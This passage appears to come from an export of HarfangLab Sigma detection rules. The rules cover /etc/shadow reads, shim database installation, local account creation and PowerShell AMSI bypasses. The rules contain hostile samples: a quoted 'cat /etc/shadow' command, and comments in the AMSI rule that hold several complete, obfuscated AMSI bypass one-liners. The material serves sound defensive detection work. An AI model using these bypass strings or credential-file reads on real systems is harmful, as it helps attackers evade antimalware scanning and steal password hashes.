exclusion_lacework_datacollector:\n # /var/lib/lacework/6.11.0.21858/datacollector\n # /var/lib/lacework/6.7.6.19823/datacollector\n ProcessImage: '/var/lib/lacework/*/datacollector'\n\n exclusion_docker:\n - 
ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/local/bin/dockerd'\n - '/usr/bin/podman'\n - ProcessAncestors|contains:\n - '/var/lib/rancher/rke2/data/*/bin/containerd-shim-runc-v2|/'\n - '|/usr/bin/conmon|/usr/bin/podman|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/dockerd|'\n\n exclusion_pacemaker:\n - ProcessCurrentDirectory|startswith: '/var/lib/pacemaker/'\n ProcessGrandparentCommandLine|startswith: '/bin/sh /usr/lib/ocf/resource.d/heartbeat/'\n - ProcessCurrentDirectory|startswith: '/var/lib/pacemaker/'\n ProcessParentCommandLine|startswith: '/bin/sh /usr/lib/ocf/resource.d/heartbeat/'\n - ProcessParentImage: '/usr/libexec/pacemaker/pacemaker-execd'\n\n exclusion_hive_client:\n ProcessCommandLine|startswith:\n - '/usr/bin/python? /usr/local/bin/hive-client '\n - '/usr/bin/python?.? /usr/local/bin/hive-client '\n - '/usr/bin/python?.?? /usr/local/bin/hive-client '\n\n exclusion_ldirectord:\n ProcessName: 'ldirectord'\n ProcessCommandLine: '/usr/bin/perl -w /usr/sbin/ldirectord /etc/ha.d/ldirectord.cf status'\n\n exclusion_qpsmtpd:\n ProcessImage: '/usr/bin/perl'\n ProcessCommandLine|startswith: '/usr/bin/perl -tw /usr/bin/qpsmtpd-forkserver '\n\n exclusion_gapagent:\n ProcessCommandLine|startswith: '/usr/local/bin/perl /usr/local/bin/rcmd a_pgap windows/start_gap_agent.pl '\n\n exclusion_proxmox:\n - ProcessCommandLine: '/usr/lib/x86_64-linux-gnu/proxmox-backup/proxmox-backup-api'\n - ProcessCommandLine: 'pvedaemon'\n ProcessParentCommandLine: 'pvedaemon'\n - ProcessImage: '/usr/bin/perl'\n ProcessCommandLine:\n - '/usr/bin/perl /usr/bin/pmgdaemon start'\n - '/usr/bin/perl * /usr/bin/pvedaemon start'\n - 'pvedaemon worker'\n - 'pvedaemon'\n - 'pmgdaemon worker'\n - 'pmgdaemon'\n\n exclusion_agent:\n ProcessImage: '/usr/local/bin/agent'\n\n exclusion_systsem:\n ProcessParentImage: '/usr/lib/systemd/systemd'\n\n exclusion_detect:\n ProcessCommandLine|startswith: 
'/usr/bin/perl -w /opt/detect/bin/'\n\n exclusion_cyberwatch:\n - ProcessParentGrandparentCommandLine|startswith: 'python3 /usr/bin/cyberwatch-agent'\n - ProcessGrandparentGrandparentCommandLine|startswith: 'python3 /usr/bin/cyberwatch-agent'\n\n exclusion_tanium:\n - ProcessParentCommandLine|startswith:\n - '/bin/bash /opt/tanium/taniumclient/vb/tempunix_'\n - '/opt/tanium/taniumclient/taniumclient '\n - ProcessAncestors|contains:\n - '/opt/tanium/taniumclient/taniumclient'\n - '/opt/tanium/taniumclient/taniumspawnhelper'\n - '/opt/tanium/taniumclient/taniumcx'\n\n exclusion_grep:\n ProcessCommandLine:\n - 'grep * /'\n - 'grep * /etc'\n - 'grep * /etc/'\n\n exclusion_awk:\n ProcessImage: '/usr/bin/gawk'\n ProcessCommandLine|startswith:\n - 'awk -F: ($2 == \"\" ) { '\n - 'awk -F: $2~/^\\$.+\\$/{'\n - 'awk -F: ($2~/^\\$.+\\$/) {'\n\n exclusion_delete_user:\n ProcessCommandLine|startswith:\n - '/usr/bin/perl /usr/sbin/deluser '\n - '/usr/bin/perl -* /usr/sbin/deluser '\n\n exclusion_sympa:\n ProcessCommandLine|startswith: '/bin/perl /usr/local/sympa/bin/'\n\n exclusion_spamassassin:\n ProcessCommandLine|contains:\n - '/usr/bin/perl -T -w /bin/sa-learn '\n - '/usr/bin/perl -T -w /bin/sa-update'\n - '/usr/bin/perl -T -w /usr/bin/sa-update'\n - '/usr/bin/perl /usr/bin/pmg-smtp-filter'\n\n exclusion_salt_minion:\n ProcessCommandLine|contains:\n - '/opt/saltstack/salt/bin/python3.?? 
/usr/bin/salt-minion'\n - '/usr/bin/python3 /usr/bin/salt-minion'\n\n exclusion_cfengine:\n - ProcessParentImage: '/var/cfengine/bin/cf-execd'\n - ProcessAncestors|contains: '/var/cfengine/bin/cf-execd'\n\n exclusion_nessus:\n ProcessGrandparentCommandLine: 'sudo -u root -p Password: sh -c printf \"command_start_%s\" \"????????\"; cat /etc/shadow; printf \"command_done_%s\" \"????????\"'\n\n exclusion_convert2rhel:\n ProcessCommandLine|startswith:\n - '/usr/bin/python2 /bin/convert2rhel '\n - '/usr/bin/python2 /usr/bin/convert2rhel '\n\n exclusion_keepalived:\n ProcessParentImage: '/usr/sbin/keepalived'\n ProcessCommandLine|startswith: '/usr/bin/perl /usr/local/pf/bin/cluster/pfupdate'\n\n exclusion_zentyal:\n ProcessCommandLine: '/usr/bin/perl /usr/share/zentyal/shell $global->edition()'\n\n exclusion_nixos:\n - ProcessImage:\n - '/nix/store/*-accountsservice-*/libexec/accounts-daemon'\n - '/nix/store/*-sddm-unwrapped-*/libexec/sddm-helper'\n - '/nix/store/*-systemd-*/lib/systemd/systemd-executor'\n - ProcessParentImage: '/nix/store/*-switch-to-configuration-*/bin/switch-to-configuration'\n - ProcessGrandparentImage: '/nix/store/*-switch-to-configuration-*/bin/switch-to-configuration'\n\n exclusion_salt:\n ProcessCommandLine|startswith: '/usr/bin/python* /var/lib/salt-bootstrap/salt-call '\n\n exclusion_oracle_grid:\n ProcessAncestors|contains: '/app/*/grid/bin/orarootagent.bin'\n\n condition: selection and 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4af5cd27-b69e-4679-a1b5-b6f72cc439aa",
"rule_name": "File /etc/shadow Read",
"rule_description": "Detects an attempt to read /etc/shadow.\nThis file contains the encrypted passwords of all the accounts on the system.\nThe content of this file is often used to gather information about the system and for offline password cracking.\nIt is recommended to ensure that the process accessing this file is legitimate and that it will keep its content secret.\n",
"rule_creation_date": "2022-11-16",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.008",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4b15d896-f348-4de9-ad85-28eb72a667dd",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624760Z",
"creation_date": "2026-03-23T11:45:34.624762Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624766Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://strontic.github.io/xcyclopedia/library/sdbinst.exe-9A081E86E9FF0AA957EDA8E8D0624BAC.html",
"https://redcanary.com/blog/detecting-application-shimming/",
"https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html",
"https://blog.f-secure.com/hunting-for-application-shim-databases/",
"https://attack.mitre.org/techniques/T1546/011/"
],
"name": "t1546_011_new_shim_database.yml",
"content": "title: New Shim Database Installed\nid: 4b15d896-f348-4de9-ad85-28eb72a667dd\ndescription: |\n Detects the installation of a new shim database on the system.\n Application shims are used by Microsoft to allow backward compatibility of applications on differing Windows version.\n Attackers can register a malicious shim database to establish persistence or to elevate privileges.\n It is recommended to investigate the added shim database and the execution context of the detected process to determine the legitimacy of this action.\nreferences:\n - https://strontic.github.io/xcyclopedia/library/sdbinst.exe-9A081E86E9FF0AA957EDA8E8D0624BAC.html\n - https://redcanary.com/blog/detecting-application-shimming/\n - https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html\n - https://blog.f-secure.com/hunting-for-application-shim-databases/\n - https://attack.mitre.org/techniques/T1546/011/\ndate: 2022/10/24\nmodified: 2025/12/10\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1546.011\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject|contains: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\\{????????-????-????-????-????????????}\\DatabasePath'\n\n exclusion_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_sdbinst_program_files:\n ProcessCommandLine|startswith:\n - 'sdbinst.exe *:\\Program Files\\'\n - '?:\\WINDOWS\\System32\\sdbinst.exe *:\\Program Files\\'\n - '?:\\WINDOWS\\SysWOW64\\sdbinst.exe *:\\Program Files\\'\n - 'sdbinst.exe *:\\Program Files (x86)\\'\n - '?:\\WINDOWS\\System32\\sdbinst.exe *:\\Program Files (x86)\\'\n - '?:\\WINDOWS\\SysWOW64\\sdbinst.exe *:\\Program 
Files (x86)\\'\n\n exclusion_fp:\n ProcessCommandLine:\n - 'rundll32.exe acmigration.dll,ApplyMigrationShims'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe /preoobe'\n\n exclusion_sap:\n # C:\\Program Files (x86)\\SAP\\SapSetup\\Setup\\NwSapSetup.exe\n ProcessSigned: 'true'\n ProcessSignature: 'SAP SE'\n\n exclusion_kaspersky:\n ProcessImage: '?:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Security for Windows Server\\kavfs.exe'\n\n exclusion_acmigration:\n ProcessCommandLine: '?:\\WINDOWS\\system32\\sdbinst.exe -q ?:\\WINDOWS\\Panther\\MigrationShims\\MigShim2\\Migrating\\{5534e02f-0f5d-40dd-ba92-bea38d22384d}.sdb'\n\n exclusion_ztvoice:\n ProcessCommandLine: '?:\\windows\\system32\\sdbinst.exe -q ?:\\windows\\Speech\\Freedom Scientific ZtVoiceEnable Zt.sdb'\n\n exclusion_speech:\n ProcessCommandLine: '?:\\Windows\\system32\\sdbinst.exe -q ?:\\Windows\\Speech\\Freedom Scientific ZtVoiceEnable ZrWaveWriter.sdb'\n\n exclusion_driverstore:\n ProcessCommandLine: '?:\\Windows\\System32\\DriverStore\\FileRepository\\ipf_cpu.inf_amd64_????????????????\\ipf_uf.exe'\n\n exclusion_sigafinance:\n ProcessCommandLine: 'sdbinst -q SigaFinance.sdb'\n\n exclusion_testxpert:\n # Generic InstallShield\n ProcessParentImage: '?:\\Users\\\\*\\AppData\\Local\\Temp\\is-*\\setup.tmp'\n ProcessParentProduct: 'testXpert III'\n\n exclusion_aplus:\n ProcessCommandLine: '?:\\Windows\\SysWOW64\\sdbinst.exe -q ?:\\Users\\\\*\\AppData\\Local\\Temp\\{????????-????-????-????-????????????}\\APlusUpdater.sdb'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4b15d896-f348-4de9-ad85-28eb72a667dd",
"rule_name": "New Shim Database Installed",
"rule_description": "Detects the installation of a new shim database on the system.\nApplication shims are used by Microsoft to allow backward compatibility of applications on differing Windows version.\nAttackers can register a malicious shim database to establish persistence or to elevate privileges.\nIt is recommended to investigate the added shim database and the execution context of the detected process to determine the legitimacy of this action.\n",
"rule_creation_date": "2022-10-24",
"rule_modified_date": "2025-12-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1546.011"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4b16ffcc-7a4d-49a7-9018-19944c4ae417",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621989Z",
"creation_date": "2026-03-23T11:45:34.621991Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621995Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1136/001/"
],
"name": "t1136_net_create_local_account.yml",
"content": "title: Local User Account Created via net.exe\nid: 4b16ffcc-7a4d-49a7-9018-19944c4ae417\ndescription: |\n Detects the creation of a local user account via net1.exe.\n Adversaries may create a local account to maintain access to victim systems.\n It is recommended to analyze the parent process and more generally the execution context to look malicious content or actions.\nreferences:\n - https://attack.mitre.org/techniques/T1136/001/\ndate: 2021/03/15\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1136.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.AccountManipulation\n - classification.Windows.Behavior.Persistence\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\net1.exe'\n # Renamed binaries\n - OriginalFileName: 'net1.exe'\n selection_user:\n CommandLine|contains:\n - ' user '\n - ' users '\n selection_add:\n CommandLine|contains: '/add'\n\n # This is handled by another rule\n filter_domain:\n CommandLine|contains: '/domain'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_ancestors:\n Ancestors|contains:\n - '?:\\Windows\\CCM\\CcmExec.exe'\n - '?:\\Program Files (x86)\\wapt\\wapt-get.exe'\n - '?:\\Program Files\\ESET\\RemoteAdministrator\\Agent\\ERAAgent.exe'\n - '?:\\Program Files\\FusionInventory-Agent\\perl\\bin\\fusioninventory-agent.exe'\n - '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe'\n - '?:\\Program Files\\Pragma\\Telemote\\TelemoteService.exe'\n\n exclusion_ccm:\n - Ancestors|contains: '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n CurrentDirectory:\n - '?:\\WINDOWS\\ccmcache\\\\*\\'\n - '?:\\ccmcache\\\\*\\'\n - Ancestors|contains: '?:\\Windows\\ccmcache\\\\*\\\\*|?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n\n condition: all of selection_* and not 1 of filter_* and 
not 1 of exclusion_*\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "4b16ffcc-7a4d-49a7-9018-19944c4ae417",
"rule_name": "Local User Account Created via net.exe",
"rule_description": "Detects the creation of a local user account via net1.exe.\nAdversaries may create a local account to maintain access to victim systems.\nIt is recommended to analyze the parent process and more generally the execution context to look malicious content or actions.\n",
"rule_creation_date": "2021-03-15",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1136.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "4b7cfcaf-9e29-4919-b8df-4ffe8ea129b2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072101Z",
"creation_date": "2026-03-23T11:45:34.072103Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072108Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-PowerShell",
"http://amsi.fail/",
"https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_powershell_amsi_bypass.yml",
"content": "title: AMSI Bypassed via PowerShell\nid: 4b7cfcaf-9e29-4919-b8df-4ffe8ea129b2\ndescription: |\n Detects when the Antimalware Scan Interface (AMSI) is being bypassed using a PowerShell script.\n Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities.\n It is recommended to investigate the PowerShell command and the parent process for suspicious activities.\nreferences:\n - https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-PowerShell\n - http://amsi.fail/\n - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2021/06/22\nmodified: 2025/06/06\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1562.006\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.AMSIBypass\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n # Amsi ScanBuffer Patch\n selection_scanbuffer_patch:\n PowershellCommand|contains|all:\n - 'kernel32'\n - 'GetProcAddress'\n - 'LoadLibrary'\n - 'VirtualProtect'\n - 'amsi'\n\n selection_scanbuffer_patch_inmemory:\n PowershellCommand|contains|all:\n - '[Reflection.Assembly]::Load'\n - 'System.Management.Automation.PSTypeName'\n\n # https://hastebin.com/seyapuzanu.md\n # $A=\"5492868772801748688168747280728187173688878280688776828\"\n # $B=\"1173680867656877679866880867644817687416876797271\"\n # [Ref].Assembly.GetType([string](0..37|%{[char][int](29+($A+$B).\n # substring(($_*2),2))})-replace \" \" ).\n # GetField([string](38..51|%{[char][int](29+($A+$B).\n # substring(($_*2),2))})-replace \" \",'Non' + 'Public,Static').\n # SetValue($null,$true)\n selection_matt_graebers:\n PowershellCommand|contains|all:\n - '[Ref].Assembly.GetType(*)'\n - 'GetField(*)'\n - 'SetValue($null,$true)'\n - 'Non'\n - 'Public,Static'\n - 
'[char][int](*)'\n - 'substring'\n - '-replace'\n\n selection_matt_graebers_reflection:\n PowershellCommand|contains|all:\n - 'System.Management.Automation.AmsiUtils'\n - 'amsiInitFailed'\n - 'SetValue'\n\n # Example: [Ref].Assembly.GetType($kdmaqxys).GetField($(('ámsîÎ'+'nítFá'+'íled').NoRmALIZE([chAR](70)+[char](111+94-94)+[CHaR]([bYte]0x72)+[CHaR]([ByTE]0x6d)+[cHAR](38+30)) -replace [ChAr]([bytE]0x5c)+[cHAR](112)+[ChAr]([bYTe]0x7b)+[cHAr](77)+[CHaR]([bYTe]0x6e)+[cHar](125*39/39)),\"NonPublic,Static\").SetValue($IVnsGO,$true);\n selection_matt_graebers_reflection_extended:\n PowershellCommand|contains|all:\n - '[Ref].Assembly.GetType(*).GetField($(*),\"NonPublic,Static\").SetValue(*,$true);'\n - '+[Char]([byte]0x??)'\n\n # Example: [Runtime.InteropServices.Marshal]::(\"$(('Wrít'+'eÎnt'+'32').NoRmAlize([cHAr](70)+[CHAR](20+91)+[cHaR](114)+[chAR](101+8)+[cHar]([ByTe]0x44)) -replace [cHAR]([BytE]0x5c)+[char]([BYte]0x70)+[cHar](123*40/40)+[char](77+68-68)+[cHaR]([BYte]0x6e)+[char](81+44))\")([Ref].Assembly.GetType($rwdjas).GetField(\"$(('àmsì'+'Cónt'+'ext').norMalIZe([ChaR]([bYte]0x46)+[cHar]([BYTe]0x6f)+[CHAr]([BytE]0x72)+[cHAr]([bYtE]0x6d)+[CHAR](68)) -replace [chAR](92*69/69)+[char]([byTE]0x70)+[CHaR]([byte]0x7b)+[CHAr]([bYTe]0x4d)+[CHAR]([byte]0x6e)+[chAr]([ByTe]0x7d))\",[Reflection.BindingFlags]\"NonPublic,Static\").GetValue($S),0x65f00ba7);\n selection_matt_graebers_reflection_second_method:\n PowershellCommand|contains|all:\n - '[Runtime.InteropServices.Marshal]::(\"$(*)\")([Ref].Assembly.GetType(*).GetField(\"$(*)\",[Reflection.BindingFlags]\"NonPublic,Static\").GetValue(*),0x????????);'\n - '+[Char]([byte]0x??)'\n\n # Example: [Delegate]::CreateDelegate((\"Func``3[String, 
$(([String].Assembly.GetType($([chaR]([bYte]0x53)+[ChAR]([bytE]0x79)+[chAR]([bYte]0x73)+[chaR]([byTe]0x74)+[cHAR](101)+[chAR]([byte]0x6d)+[CHAR]([bYte]0x2e)+[cHAr](82*75/75)+[CHar](101)+[chAR](102+27-27)+[chaR](39+69)+[chAr]([byTE]0x65)+[CHAr]([BYtE]0x63)+[cHaR]([BYte]0x74)+[ChAr](105*47/47)+[Char]([BYTe]0x6f)+[ChaR]([BytE]0x6e)+[ChAr](46)+[chaR](66*17/17)+[ChAr]([BYTe]0x69)+[chAR](110)+[chaR](100*37/37)+[cHAR]([byte]0x69)+[chAR](85+25)+[char](89+14)+[CHar](70)+[ChAR]([BytE]0x6c)+[ChAr](26+71)+[ChAr](53+50)+[cHAR]([bYTE]0x73)))).FullName), $([chaR](83)+[Char](121+89-89)+[CHar]([bytE]0x73)+[ChaR]([bYtE]0x74)+[ChAr]([bYte]0x65)+[ChAr](109*103/103)).Reflection.FieldInfo]\" -as [String].Assembly.GetType($([CHar]([bYtE]0x53)+[Char]([ByTe]0x79)+[cHAR](115+12-12)+[cHAr](116)+[cHar](58+43)+[char]([BYte]0x6d)+[chAR]([bYte]0x2e)+[ChaR](84*5/5)+[ChaR](121+93-93)+[CHaR]([byte]0x70)+[cHaR]([bYTe]0x65)))), [Object]([Ref].Assembly.GetType($qgmaiwhn)),($([CHAR]([byTe]0x47)+[chaR](47+54)+[cHaR]([bYtE]0x74)+[CHAR](70*35/35)+[CHaR]([bYTe]0x69)+[CHar](101*99/99)+[chaR]([byTe]0x6c)+[char](100*25/25)))).Invoke($([char]([byte]0x61)+[cHAr](109)+[chAR]([byTE]0x73)+[ChAR](105)+[CHAr]([BYtE]0x49)+[cHar](23+87)+[ChAr](105)+[cHAR](116+23-23)+[ChAr]([BYte]0x46)+[CHaR](97+54-54)+[ChAr](105+85-85)+[chaR](108*43/43)+[chAR](101*85/85)+[chaR]([BYte]0x64)),((\"NonPublic,Static\") -as [String].Assembly.GetType($([chaR]([bYte]0x53)+[ChAR]([bytE]0x79)+[chAR]([bYte]0x73)+[chaR]([byTe]0x74)+[cHAR](101)+[chAR]([byte]0x6d)+[CHAR]([bYte]0x2e)+[cHAr](82*75/75)+[CHar](101)+[chAR](102+27-27)+[chaR](39+69)+[chAr]([byTE]0x65)+[CHAr]([BYtE]0x63)+[cHaR]([BYte]0x74)+[ChAr](105*47/47)+[Char]([BYTe]0x6f)+[ChaR]([BytE]0x6e)+[ChAr](46)+[chaR](66*17/17)+[ChAr]([BYTe]0x69)+[chAR](110)+[chaR](100*37/37)+[cHAR]([byte]0x69)+[chAR](85+25)+[char](89+14)+[CHar](70)+[ChAR]([BytE]0x6c)+[ChAr](26+71)+[ChAr](53+50)+[cHAR]([bYTE]0x73))))).SetValue($UFfNkIcCX,$True);\n 
selection_matt_graebers_reflection_method_with_WMF5_autologging_bypass :\n PowershellCommand|contains|all:\n - '[Delegate]::CreateDelegate((\"Func``3[String, $(([String].Assembly.GetType($(*))).FullName), $(*).Reflection.FieldInfo]\" -as [String].Assembly.GetType($(*))), [Object]([Ref].Assembly.GetType($*)),($(*))).Invoke($(*),((\"NonPublic,Static\") -as [String].Assembly.GetType($(*)))).SetValue($*,$True);'\n - '+[Char]([byte]0x??)'\n\n # Example: [Ref].Assembly.GetType(\"$(('Sys'+'tem').NOrMalIze([chaR](46+24)+[chAr](111+75-75)+[Char](114*89/89)+[ChaR]([bytE]0x6d)+[cHar](68+33-33)) -replace [ChaR]([bYte]0x5c)+[cHAr]([byTE]0x70)+[cHAr](123*74/74)+[chaR]([ByTE]0x4d)+[CHar](104+6)+[cHar](125+27-27)).$(('Mänàgeme'+'nt').norMaLIZe([chAR](70*33/33)+[cHAr]([byte]0x6f)+[CHAR](103+11)+[chAr]([bYTE]0x6d)+[CHaR]([bYte]0x44)) -replace [CHar](92*12/12)+[chaR](112+67-67)+[CHar]([byTe]0x7b)+[ChaR]([byte]0x4d)+[CHaR]([BYtE]0x6e)+[CHar]([bytE]0x7d)).$(('Âutóm'+'ãtíôn').nOrmaLIZE([char]([byTe]0x46)+[CHaR](82+29)+[chAR]([ByTE]0x72)+[ChAR](100+9)+[CHaR](68)) -replace [CHar]([bYte]0x5c)+[cHAr]([bYte]0x70)+[ChaR]([bytE]0x7b)+[cHaR](39+38)+[CHAr](110+86-86)+[ChaR]([BYTe]0x7d)).$(('ÀmsîUtí'+'ls').NOrMalIze([Char](70)+[CHar]([bYTE]0x6f)+[CHAR]([bYtE]0x72)+[cHar]([byTe]0x6d)+[CHAR]([ByTe]0x44)) -replace [ChAr]([bYTe]0x5c)+[CHaR](54+58)+[cHar]([BytE]0x7b)+[CHAr](77*23/23)+[chAr](110+30-30)+[chAr](38+87))\").GetField(\"$([CHaR]([BYtE]0x61)+[ChaR]([byTe]0x6d)+[Char]([bYtE]0x73)+[CHar]([bYtE]0x69)+[ChaR]([BYtE]0x53)+[ChaR]([ByTE]0x65)+[ChAr]([BytE]0x73)+[ChAR](115*22/22)+[ChAr](105+89-89)+[cHAr](111*4/4)+[cHAr](7+103))\", \"NonPublic,Static\").SetValue($c, $null);[Ref].Assembly.GetType(\"$(('Sys'+'tem').NOrMalIze([chaR](46+24)+[chAr](111+75-75)+[Char](114*89/89)+[ChaR]([bytE]0x6d)+[cHar](68+33-33)) -replace 
[ChaR]([bYte]0x5c)+[cHAr]([byTE]0x70)+[cHAr](123*74/74)+[chaR]([ByTE]0x4d)+[CHar](104+6)+[cHar](125+27-27)).$(('Mänàgeme'+'nt').norMaLIZe([chAR](70*33/33)+[cHAr]([byte]0x6f)+[CHAR](103+11)+[chAr]([bYTE]0x6d)+[CHaR]([bYte]0x44)) -replace [CHar](92*12/12)+[chaR](112+67-67)+[CHar]([byTe]0x7b)+[ChaR]([byte]0x4d)+[CHaR]([BYtE]0x6e)+[CHar]([bytE]0x7d)).$(('Âutóm'+'ãtíôn').nOrmaLIZE([char]([byTe]0x46)+[CHaR](82+29)+[chAR]([ByTE]0x72)+[ChAR](100+9)+[CHaR](68)) -replace [CHar]([bYte]0x5c)+[cHAr]([bYte]0x70)+[ChaR]([bytE]0x7b)+[cHaR](39+38)+[CHAr](110+86-86)+[ChaR]([BYTe]0x7d)).$(('ÀmsîUtí'+'ls').NOrMalIze([Char](70)+[CHar]([bYTE]0x6f)+[CHAR]([bYtE]0x72)+[cHar]([byTe]0x6d)+[CHAR]([ByTe]0x44)) -replace [ChAr]([bYTe]0x5c)+[CHaR](54+58)+[cHar]([BytE]0x7b)+[CHAr](77*23/23)+[chAr](110+30-30)+[chAr](38+87))\").GetField(\"$(('äms'+'ìCõ'+'nte'+'xt').NORMAliZe([CHAr]([bYTe]0x46)+[chAR]([bYte]0x6f)+[cHAR](114)+[char](109*54/54)+[CHAR]([BYte]0x44)) -replace [cHar](8+84)+[ChAR](35+77)+[CHAr]([BYtE]0x7b)+[cHAR]([byte]0x4d)+[cHar](110*38/38)+[cHAR]([Byte]0x7d))\", \"NonPublic,Static\").SetValue($null, [IntPtr]$pasaaac);\n selection_unknown_force_error:\n PowershellCommand|contains|all:\n - '[Ref].Assembly.GetType(\"$(*).$(*).$(*).$(*)\").GetField(\"$(*)\", \"NonPublic,Static\").SetValue($*, $null);[Ref].Assembly.GetType(\"$(*).$(*).$(*).$(*)\").GetField(\"$(*)\", \"NonPublic,Static\").SetValue($*, [IntPtr]$*);'\n - '+[Char]([byte]0x??)'\n\n selection_dll_hijack:\n PowershellCommand|contains|all:\n - '$DllBytes'\n - '[System.IO.File]::WriteAllBytes'\n - 'amsi.dll'\n\n selection_nishang_all_in_one_cmdlet:\n PowershellCommand|contains: 'Invoke-AmsiBypass'\n\n selection_nishang_all_in_one_subcmds:\n PowershellCommand|contains|all:\n - 'unload2'\n - 'unloadsilent'\n - 'unloadobfuscated'\n - 'dllhijack'\n - 